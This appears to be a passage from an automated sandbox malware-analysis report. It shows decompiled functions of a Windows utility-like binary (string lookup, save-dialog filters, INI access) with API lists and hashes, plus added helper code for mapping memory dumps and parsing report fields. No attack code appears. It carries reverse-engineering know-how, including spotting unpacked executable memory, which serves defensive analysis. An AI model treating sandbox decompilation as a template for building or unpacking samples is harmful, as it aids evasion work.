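    "0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp",
    "0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp",
    "0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp",
    "0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp",
    "0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp",
]

if __name__ == "__main__":
    for r in region_map(SAMPLE_DUMPS):
        print(f"proc {r.proc:#x} base {r.base:#010x} {r.protect_name:<22} {r.type_name}")
    print("private executable:", private_executable(SAMPLE_DUMPS))
```

Run it over the names from a report's "Memory Dump Source" block to see the layout at a glance; a dump whose executable region sits in MEM_PRIVATE rather than MEM_IMAGE memory is the one to feed to a PE fixer or to compare against the on-disk file.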
C-Code - Quality: 92%
/* E0040A084: resolves the wide-string argument _a4 to a 32-bit value.
   A numeric argument of fewer than three characters is converted and used
   as an index; anything else is matched by name against two tables of
   0x14-byte entries (value at +0, name pointer at +0x10). The result is
   appended to a global array at 0x4131d8 whose count lives at 0x4131d4.
   Decompiler output; the L0040xxxx calls are unresolved import thunks. */
E0040A084(void* __eax, void* __eflags, wchar_t* _a4, intOrPtr _a8) {
    signed int _v8;
    signed int _v12;
    signed int _v16;
    void* __ebx;
    signed int _t57;
    signed int _t58;
    intOrPtr _t60;
    intOrPtr _t62;
    intOrPtr _t66;
    intOrPtr _t67;
    signed int _t71;
    void* _t76;
    signed int _t80;
    wchar_t* _t91;
    void* _t92;
    void* _t94;
    void* _t95;

    _t76 = __eax;
    E00407A66(__eax, __eflags);
    _v12 = 0;
    _t57 = 0;
    while(1) {
        _t91 = _a4;
        /* (wchar - L'0') > 9 as an unsigned compare: not a decimal digit */
        if((*(_t91 + _t57 * 2) & 0x0000ffff) + 0xffffffd0 > 9) {
            break;
        }
        _t57 = _t57 + 1;
        if(_t57 < 1) {
            continue;
        }
        _t71 = wcslen(_t91);
        if(_t71 >= 3) {
            break;
        }
        _push(_t91);
        L0040E062(); /* converts the string; the eax result (_t71) is used as an index below */
        /* bounds check against the entry count at +0x34, then indirect
           through the index table at +0x38 into the entry table at +0x2e4 */
        if(_t71 >= 0 && _t71 < *((intOrPtr*)(_t76 + 0x34))) {
            _v12 = *((intOrPtr*)( *( *((intOrPtr*)(_t76 + 0x38)) + _t71 * 4) * 0x14 + *((intOrPtr*)(_t76 + 0x2e4))));
        }
        L19:
        /* second argument set: OR 0x1000 into the value */
        if(_a8 != 0) {
            _v12 = _v12 | 0x00001000;
        }
        /* append the value to the global result list */
        _t80 = *0x4131d4; // 0x1
        _t58 = _v12;
        *0x4131d4 = *0x4131d4 + 1;
        *((intOrPtr*)(0x4131d8 + _t80 * 4)) = _t58;
        return _t58;
    }
    __eflags = *((intOrPtr*)(_t76 + 0x2e0));
    _v16 = 0;
    _v8 = 0;
    if(*((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
        L14:
        _t92 = 0;
        __eflags = *((intOrPtr*)(_t76 + 0x2e0));
        _v8 = 0;
        if(*((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
            goto L19;
        } else {
            goto L15;
        }
        /* second pass: E0040546C compares _a4 against the name at +0x10 of
           each entry in both tables; a non-negative result counts as a match */
        do {
            L15:
            _t60 = E0040546C(*((intOrPtr*)(_t92 + *((intOrPtr*)(_t76 + 0x2e4)) + 0x10)), _a4);
            _t62 = E0040546C(*((intOrPtr*)( *((intOrPtr*)(_t76 + 0x48)) + _t92 + 0x10)), _a4);
            _t95 = _t95 + 0x10;
            __eflags = _t60;
            if(_t60 >= 0) {
                L17:
                _v12 = *((intOrPtr*)(_t92 + *((intOrPtr*)(_t76 + 0x2e4))));
                goto L18;
            }
            __eflags = _t62;
            if(_t62 < 0) {
                goto L18;
            }
            goto L17;
            L18:
            _v8 = _v8 + 1;
            _t92 = _t92 + 0x14; /* next 0x14-byte entry */
            __eflags = _v8 - *((intOrPtr*)(_t76 + 0x2e0));
        } while (_v8 < *((intOrPtr*)(_t76 + 0x2e0)));
        goto L19;
    }
    /* first pass: exact compare (L0040E03E returns 0 on match) of _a4 against
       the name in each entry of both tables; a match records the value in
       _v12 and sets _v16, but the loop runs to the end of the table */
    _t94 = 0;
    __eflags = 0;
    do {
        _push(_a4);
        _t66 = *((intOrPtr*)(_t76 + 0x2e4));
        _push(*((intOrPtr*)(_t94 + _t66 + 0x10)));
        L0040E03E();
        _push(_a4);
        _t67 = *((intOrPtr*)(_t76 + 0x48));
        _push(*((intOrPtr*)(_t67 + _t94 + 0x10)));
        L0040E03E();
        _t95 = _t95 + 0x10;
        __eflags = _t66;
        if(_t66 == 0) {
            L11:
            _v12 = *(_t94 + *((intOrPtr*)(_t76 + 0x2e4)));
            _v16 = 1;
            goto L12;
        }
        __eflags = _t67;
        if(_t67 != 0) {
            goto L12;
        }
        goto L11;
        L12:
        _v8 = _v8 + 1;
        _t94 = _t94 + 0x14; /* next 0x14-byte entry */
        __eflags = _v8 - *((intOrPtr*)(_t76 + 0x2e0));
    } while (_v8 < *((intOrPtr*)(_t76 + 0x2e0)));
    __eflags = _v16;
    if(_v16 != 0) {
        goto L19;
                                                                                                                                                				}
                                                                                                                                                				goto L14;
                                                                                                                                                			}





















APIs
  • Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
  • Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E
• wcslen.MSVCRT ref: 0040A0B2
• _wtoi.MSVCRT ref: 0040A0BE
• _wcsicmp.MSVCRT ref: 0040A10C
• _wcsicmp.MSVCRT ref: 0040A11D
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: _wcsicmp$??2@??3@_wtoiwcslen
• String ID:
• API String ID: 1549203181-0
• Opcode ID: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
• Instruction ID: 173153ae92e8ec93863a9f5982dcfa1c11e383f1bf25a9e136d2eac58130d476
• Opcode Fuzzy Hash: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
• Instruction Fuzzy Hash: D2415C31900304AFCB21DF69C580A9EBBB4EF44355F1444BAEC05EB396D678DAA18B59
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040AB6E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                				char _v16;
                                                                                                                                                				char* _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				char* _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				char* _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				char* _v44;
                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                				char* _v52;
                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                				char* _v60;
                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                				char* _v68;
                                                                                                                                                				intOrPtr _v72;
                                                                                                                                                				char* _v76;
                                                                                                                                                				char _v80;
                                                                                                                                                				void _v2126;
                                                                                                                                                				signed short _v2128;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				char _t32;
                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                				char _t34;
                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                				signed short _t57;
                                                                                                                                                				char* _t62;
                                                                                                                                                				char* _t64;
                                                                                                                                                
                                                                                                                                                				_v2128 = _v2128 & 0x00000000;
                                                                                                                                                				memset( &_v2126, 0, 0x7fe);
                                                                                                                                                				_t32 =  *((intOrPtr*)(L"txt")); // 0x780074
                                                                                                                                                				_v16 = _t32;
                                                                                                                                                				_t33 =  *0x410294; // 0x74
                                                                                                                                                				_v12 = _t33;
                                                                                                                                                				_t34 = E00406827(0x1f5);
                                                                                                                                                				_t64 = L"*.txt";
                                                                                                                                                				_v80 = _t34;
                                                                                                                                                				_v76 = _t64;
                                                                                                                                                				_v72 = E00406827(0x1f6);
                                                                                                                                                				_v68 = _t64;
                                                                                                                                                 				_v64 = E00406827(0x1f7);          // description text: resource string (E00406827 wraps LoadStringW, see subcalls below)
                                                                                                                                                 				_v60 = L"*.json";                 // file pattern paired with it
                                                                                                                                                 				_v56 = E00406827(0x1fb);
                                                                                                                                                 				_v52 = L"*.csv";
                                                                                                                                                 				_t38 = E00406827(0x1f8);
                                                                                                                                                 				_t62 = L"*.htm;*.html";
                                                                                                                                                 				_v48 = _t38;
                                                                                                                                                 				_v44 = _t62;
                                                                                                                                                 				_v40 = E00406827(0x1f9);          // second HTML entry shares the *.htm;*.html pattern
                                                                                                                                                 				_v36 = _t62;
                                                                                                                                                 				_v32 = E00406827(0x1fa);
                                                                                                                                                 				_v28 = L"*.xml";
                                                                                                                                                 				_v24 = E00406827(0x1fc);
                                                                                                                                                 				_v20 = _t64;                      // pattern assigned before this fragment (not shown)
                                                                                                                                                 				E00406050( &_v2128,  &_v80);      // builds the dialog filter block from the (text, pattern) pairs starting at _v80
                                                                                                                                                 				_t57 = 7;
                                                                                                                                                 				return E00405DCD(_a12,  *((intOrPtr*)(_a4 + 0x208)), _a8,  &_v2128, E00406827(_t57),  &_v16);   // E00405DCD calls GetSaveFileNameW
                                                                                                                                                 			}

                                                                                                                                                 Statement addresses: 0x0040ab77 to 0x0040ac71 (per-statement address column of the code view)

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040AB90
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                  • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                  • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                  • Part of subcall function 00406050: memset.MSVCRT ref: 00406071
                                                                                                                                                  • Part of subcall function 00406050: _snwprintf.MSVCRT ref: 0040609F
                                                                                                                                                  • Part of subcall function 00406050: wcslen.MSVCRT ref: 004060AB
                                                                                                                                                  • Part of subcall function 00406050: memcpy.MSVCRT ref: 004060C3
                                                                                                                                                  • Part of subcall function 00406050: wcslen.MSVCRT ref: 004060D1
                                                                                                                                                  • Part of subcall function 00406050: memcpy.MSVCRT ref: 004060E4
                                                                                                                                                  • Part of subcall function 00405DCD: GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
                                                                                                                                                  • Part of subcall function 00405DCD: wcscpy.MSVCRT ref: 00405E33
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                • String ID: *.htm;*.html$*.txt$txt
                                                                                                                                                • API String ID: 1392923015-1706329710
                                                                                                                                                • Opcode ID: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
                                                                                                                                                • Instruction ID: 6a1f0fe5a8f9a0d06c10808573add6bd6f8ed95605c5985f6cf117c7f3196cfa
                                                                                                                                                • Opcode Fuzzy Hash: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
                                                                                                                                                • Instruction Fuzzy Hash: 5C215EB2D0121A9FCB40EF96D885ADDBBB4FF04308F10807BE409B7281DB7859418F99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
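
The fragment above fills a list of (string, pattern) pairs starting at _v80, hands it to E00406050 (whose subcalls are memset, _snwprintf, wcslen and memcpy) and then to E00405DCD, which calls GetSaveFileNameW. That is the shape of an OPENFILENAME.lpstrFilter block: description NUL pattern NUL, repeated, closed by one extra NUL. The following is an added illustration in standard C by the editor of this page, not code from the sample or from the report; the description texts, the "%ls (%ls)" display format and all function names are assumptions, since the resource strings E00406827 loads are not visible here.

```c
#include <stdio.h>
#include <string.h>
#include <wchar.h>

/* One (description, pattern) pair: the same two-pointer layout the
   decompiled fragment stores at _v80.._v20. */
typedef struct {
    const wchar_t *description;   /* in the sample: a LoadStringW resource string */
    const wchar_t *pattern;       /* e.g. L"*.htm;*.html" */
} filter_pair_t;

/* Build a COMDLG32 filter block, "desc\0pattern\0 ... desc\0pattern\0\0",
   from the pairs. Returns the number of wchar_t written including the
   closing empty string, or 0 if the block would not fit in cap slots. */
size_t build_filter_block(const filter_pair_t *pairs, size_t n,
                          wchar_t *out, size_t cap)
{
    wchar_t desc[128];
    size_t pos = 0;

    memset(out, 0, cap * sizeof *out);          /* like the memset in E00406050 */
    for (size_t i = 0; i < n; i++) {
        /* Display text shown in the dialog; "%ls (%ls)" is an assumed format. */
        if (swprintf(desc, sizeof desc / sizeof *desc, L"%ls (%ls)",
                     pairs[i].description, pairs[i].pattern) < 0)
            return 0;
        size_t dlen = wcslen(desc);
        size_t plen = wcslen(pairs[i].pattern);
        /* Room for both strings, their NULs and the final closing NUL. */
        if (pos + dlen + 1 + plen + 1 + 1 > cap)
            return 0;
        memcpy(out + pos, desc, (dlen + 1) * sizeof *out);
        pos += dlen + 1;
        memcpy(out + pos, pairs[i].pattern, (plen + 1) * sizeof *out);
        pos += plen + 1;
    }
    out[pos++] = L'\0';                         /* empty string ends the block */
    return pos;
}

/* Walk a complete filter block (e.g. one recovered from a memory dump)
   and count its (description, pattern) pairs. */
size_t count_filter_pairs(const wchar_t *block)
{
    size_t strings = 0;
    for (const wchar_t *p = block; *p; p += wcslen(p) + 1)
        strings++;
    return strings / 2;
}

/* Constructed sample mirroring the patterns seen in the fragment; the
   description texts are placeholders for the resource strings. */
static const filter_pair_t sample_pairs[] = {
    { L"JSON File", L"*.json" },
    { L"CSV File",  L"*.csv" },
    { L"HTML File", L"*.htm;*.html" },
    { L"XML File",  L"*.xml" },
    { L"Text File", L"*.txt" },
};
#define SAMPLE_COUNT (sizeof sample_pairs / sizeof sample_pairs[0])

size_t demo_block_length(void)
{
    wchar_t block[512];
    return build_filter_block(sample_pairs, SAMPLE_COUNT, block, 512);
}

size_t demo_pair_count(void)
{
    wchar_t block[512];
    if (build_filter_block(sample_pairs, SAMPLE_COUNT, block, 512) == 0)
        return 0;
    return count_filter_pairs(block);
}

/* A buffer too small for even the first pair is refused rather than cut. */
size_t demo_too_small(void)
{
    wchar_t block[16];
    return build_filter_block(sample_pairs, SAMPLE_COUNT, block, 16);
}

int main(void)
{
    printf("block length: %zu wchar_t, pairs: %zu\n",
           demo_block_length(), demo_pair_count());
    return 0;
}
```

count_filter_pairs only stops at the closing empty string, so point it at a block known to be complete (two consecutive NULs present); on a truncated dump region it would read past the buffer.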

                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                 			E00406613(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                 				signed int _t21;
                                                                                                                                                 				signed int _t23;
                                                                                                                                                 				void* _t24;
                                                                                                                                                 				signed int _t31;
                                                                                                                                                 				void* _t33;
                                                                                                                                                 				void* _t44;
                                                                                                                                                 				signed int _t46;
                                                                                                                                                 				void* _t48;
                                                                                                                                                 				signed int _t51;
                                                                                                                                                 				int _t52;
                                                                                                                                                 				void** _t53;
                                                                                                                                                 				void* _t58;
                                                                                                                                                 
                                                                                                                                                 				_t53 = __esi;                              // object: [0] = slot array, [1] = slot capacity, [2] = growth step
                                                                                                                                                 				_t1 =  &(_t53[1]); // 0x0
                                                                                                                                                 				_t51 =  *_t1;                              // current capacity in 8-byte slots
                                                                                                                                                 				_t21 = 0;
                                                                                                                                                 				if(_t51 <= 0) {
                                                                                                                                                 					L4:                                    // no free slot (or nothing allocated yet): grow
                                                                                                                                                 					_t2 =  &(_t53[2]); // 0x8
                                                                                                                                                 					_t33 =  *_t53;                         // old array, may be NULL
                                                                                                                                                 					_t23 =  *_t2 + _t51;                   // new capacity = old capacity + growth step
                                                                                                                                                 					_t46 = 8;
                                                                                                                                                 					_t53[1] = _t23;
                                                                                                                                                 					_t24 = _t23 * _t46;                    // byte size; the _t58 term in the next line is a flags artefact of the decompiler
                                                                                                                                                 					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                                                                 					L0040E038();                           // operator new (??2@ in the API ID below)
                                                                                                                                                 					_t10 =  &(_t53[1]); // 0x0
                                                                                                                                                 					 *_t53 = _t24;
                                                                                                                                                 					memset(_t24, 0,  *_t10 << 3);          // zero every slot of the new array
                                                                                                                                                 					_t52 = _t51 << 3;
                                                                                                                                                 					memcpy( *_t53, _t33, _t52);            // copy the old slots over
                                                                                                                                                 					if(_t33 != 0) {
                                                                                                                                                 						_push(_t33);
                                                                                                                                                 						L0040E032();                       // operator delete (??3@) on the old array
                                                                                                                                                 					}
                                                                                                                                                 					 *((intOrPtr*)( *_t53 + _t52)) = _a4;  // new entry goes into the first added slot (index = old capacity)
                                                                                                                                                 					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                                                                 				} else {
                                                                                                                                                 					_t44 =  *__esi;
                                                                                                                                                 					_t48 = _t44;
                                                                                                                                                 					while( *_t48 != 0) {                   // scan for a slot whose first dword is 0 (treated as free)
                                                                                                                                                 						_t21 = _t21 + 1;
                                                                                                                                                 						_t48 = _t48 + 8;
                                                                                                                                                 						_t58 = _t21 - _t51;
                                                                                                                                                 						if(_t58 < 0) {
                                                                                                                                                 							continue;
                                                                                                                                                 						} else {
                                                                                                                                                 							goto L4;                       // every slot in use
                                                                                                                                                 						}
                                                                                                                                                 						goto L7;
                                                                                                                                                 					}
                                                                                                                                                 					_t31 = _t21 << 3;
                                                                                                                                                 					 *((intOrPtr*)(_t44 + _t31)) = _a4;    // reuse the free slot found by the scan
                                                                                                                                                 					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                                                                 				}
                                                                                                                                                 				L7:
                                                                                                                                                 				return 1;                                  // always reports success
                                                                                                                                                 			}

                                                                                                                                                 Statement addresses: 0x00406613 to 0x004066a3 (per-statement address column of the code view)

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                • Opcode ID: 8e0fc6793aebc9f9da890fe29524187452bc62cfb9288e210baf46e5438cf18a
                                                                                                                                                • Instruction ID: 0097541d92ab95bcfef6608398cdc2c51d263adba4e227b481c9d82b5fae792d
                                                                                                                                                • Opcode Fuzzy Hash: 8e0fc6793aebc9f9da890fe29524187452bc62cfb9288e210baf46e5438cf18a
                                                                                                                                                • Instruction Fuzzy Hash: EB114C716046019FD328DF2DC881A26F7E9EFD8300B218D3EE59A97395DA76E811CB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 35%
                                                                                                                                                			E0040D5E8(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                                                                				char _v16390;
                                                                                                                                                				short _v16392;
                                                                                                                                                				void* __edi;
                                                                                                                                                				intOrPtr* _t30;
                                                                                                                                                				intOrPtr* _t34;
                                                                                                                                                				signed int _t36;
                                                                                                                                                				signed int _t37;
                                                                                                                                                
                                                                                                                                                				_t30 = __ecx;
                                                                                                                                                				E0040E340(0x4004, __ecx);
                                                                                                                                                				_push(0x4000);
                                                                                                                                                				_push(0);
                                                                                                                                                				_v16392 = 0;
                                                                                                                                                				_t34 = _t30;
                                                                                                                                                				_push( &_v16390);
                                                                                                                                                				if(_a4 == 0) {
                                                                                                                                                					memset();
                                                                                                                                                					GetPrivateProfileStringW(_a8, _a12, 0x40f454,  &_v16392, 0x2000, _a20);
                                                                                                                                                					asm("sbb esi, esi");
                                                                                                                                                					_t37 =  ~_t36;
                                                                                                                                                					E00405F0A( &_v16392, _t34, _a16);
                                                                                                                                                				} else {
                                                                                                                                                					memset();
                                                                                                                                                					E00405E81(_a16,  *_t34,  &_v16392);
                                                                                                                                                					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                                                                				}
                                                                                                                                                				return _t37;
                                                                                                                                                 			}

                                                                                                                                                 Instruction addresses for the listing above, one per statement line in listing order: 0x0040d5e8 0x0040d5f0 0x0040d5fc 0x0040d601 0x0040d602 0x0040d60f 0x0040d611 0x0040d612 0x0040d647 0x0040d669 0x0040d676 0x0040d67f 0x0040d681 0x0040d614 0x0040d614 0x0040d625 0x0040d643 0x0040d643 0x0040d68d

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040D614
                                                                                                                                                  • Part of subcall function 00405E81: _snwprintf.MSVCRT ref: 00405EC6
                                                                                                                                                  • Part of subcall function 00405E81: memcpy.MSVCRT ref: 00405ED6
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D63D
                                                                                                                                                • memset.MSVCRT ref: 0040D647
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 0040D669
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1127616056-0
                                                                                                                                                • Opcode ID: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
                                                                                                                                                • Instruction ID: e5ada5cee961c9ffd84a11649d97ac6ffa4cf685c3efd691eec2e39df5646265
                                                                                                                                                • Opcode Fuzzy Hash: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
                                                                                                                                                • Instruction Fuzzy Hash: D5118272500119AFDF11AF65DC02E9E7B79EF04704F100476FF09B20A1E6359A649F9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
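The Similarity fields the report repeats under every function (API ID, API String ID, Opcode ID, Instruction Fuzzy Hash) together with the APIs list are the data an analyst pivots on to find the same routine in other reports, so it is worth having them in a machine-readable form rather than reading them off the page. The parser below is an added example; it is not part of the Joe Sandbox report and has nothing to do with the analysed binary. It assumes the record layout exactly as it appears on this page (a `C-Code - Quality` marker, the function signature on the following line, then `APIs` bullets and `Similarity` bullets) and its sample input is a transcription of the three records shown here with the decompiled bodies and address gutters left out. The third record is cut off on the page after its first three subcall APIs, so it has no Similarity data and the parser records those fields as absent instead of guessing.

```python
"""Extract per-function pivot data (APIs, Opcode ID, fuzzy hash) from a Joe Sandbox
function listing. Added example, not part of the report or of the analysed binary."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed input: the three records on this page, transcribed without their
# decompiled bodies and address gutters; the last one is cut off on the page.
SAMPLE_REPORT = """\
C-Code - Quality: 35%
\t\t\tE0040D5E8(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
\t\t\t\tE0040E340(0x4004, __ecx);
APIs
• memset.MSVCRT ref: 0040D614
  • Part of subcall function 00405E81: _snwprintf.MSVCRT ref: 00405EC6
  • Part of subcall function 00405E81: memcpy.MSVCRT ref: 00405ED6
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D63D
• memset.MSVCRT ref: 0040D647
• GetPrivateProfileStringW.KERNEL32 ref: 0040D669
Similarity
• API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
• String ID:
• API String ID: 1127616056-0
• Opcode ID: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
• Instruction Fuzzy Hash: D5118272500119AFDF11AF65DC02E9E7B79EF04704F100476FF09B20A1E6359A649F9D
C-Code - Quality: 100%
\t\t\tE00402B94(struct HWND__* _a4, int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
APIs
Similarity
• API String ID: 568519121-0
• Opcode ID: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
• Instruction Fuzzy Hash: 61115B72508314ABD711DF14CC0199FBFE8EB89750F004A2AFA64E7290D371DA20CB96
C-Code - Quality: 47%
\t\t\tE0040A3BF(void* __esi) {
APIs
  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
"""

QUALITY_RE = re.compile(r"C-Code - Quality: (\d+)%")
SIGNATURE_RE = re.compile(r"^\s*(E[0-9A-F]{8})\(")
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function ([0-9A-F]{8}):\s*)?"
                    r"([A-Za-z0-9_?@$]+)\.[A-Za-z0-9]+(?:\([^)]*\))?,?\s*ref:\s*[0-9A-F]{8}")
FIELD_RE = re.compile(r"^\s*•\s*(API String ID|Opcode ID|Instruction Fuzzy Hash):\s*(\S*)")

@dataclass
class FunctionRecord:
    name: str
    quality: int
    direct_apis: Set[str] = field(default_factory=set)
    subcall_apis: Set[str] = field(default_factory=set)   # reached through a callee
    api_string_id: Optional[str] = None
    opcode_id: Optional[str] = None
    instruction_fuzzy_hash: Optional[str] = None

    def all_apis(self) -> Set[str]:
        return self.direct_apis | self.subcall_apis

def parse_report(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current, pending_quality = None, None
    for line in text.splitlines():
        m = QUALITY_RE.search(line)
        if m:
            pending_quality = int(m.group(1))
            continue
        if pending_quality is not None:
            # Only the line right after the quality marker is a signature: decompiled
            # body lines such as E0040E340(0x4004, __ecx); also start with E........(
            m = SIGNATURE_RE.match(line)
            if m:
                current = FunctionRecord(m.group(1), pending_quality)
                records.append(current)
            pending_quality = None
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:   # group(1) is set only on "Part of subcall function" lines
            (current.subcall_apis if m.group(1) else current.direct_apis).add(m.group(2))
            continue
        m = FIELD_RE.match(line)
        if m:
            value = m.group(2) or None   # an empty field stays None, never ""
            if m.group(1) == "API String ID":
                current.api_string_id = value
            elif m.group(1) == "Opcode ID":
                current.opcode_id = value
            else:
                current.instruction_fuzzy_hash = value
    return records

def api_jaccard(a: FunctionRecord, b: FunctionRecord) -> float:
    """Coarse overlap of API names between two functions, 0.0 to 1.0."""
    x, y = a.all_apis(), b.all_apis()
    return len(x & y) / len(x | y) if (x or y) else 0.0

def find_by_opcode_id(records: List[FunctionRecord], opcode_id: str) -> List[FunctionRecord]:
    # Exact-match pivot key for looking the same routine up in another report.
    return [r for r in records if r.opcode_id == opcode_id]

if __name__ == "__main__":
    print(*parse_report(SAMPLE_REPORT), sep="\n")
```

Opcode ID and API String ID are used only as exact-match keys here, because the page does not document how Joe Sandbox derives them or how its fuzzy hashes are meant to be compared; the Jaccard score over API names is a deliberately coarse overlap measure for triage, not a similarity verdict.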

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00402B94(struct HWND__* _a4, int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
                                                                                                                                                				signed int _v32;
                                                                                                                                                				void _v48;
                                                                                                                                                				void* _v52;
                                                                                                                                                				int _v68;
                                                                                                                                                				intOrPtr _v72;
                                                                                                                                                				signed int _v80;
                                                                                                                                                				int _v92;
                                                                                                                                                				void _v96;
                                                                                                                                                				void* _v100;
                                                                                                                                                				signed int _t34;
                                                                                                                                                
                                                                                                                                                				memset( &_v96, 0, 0x2c);
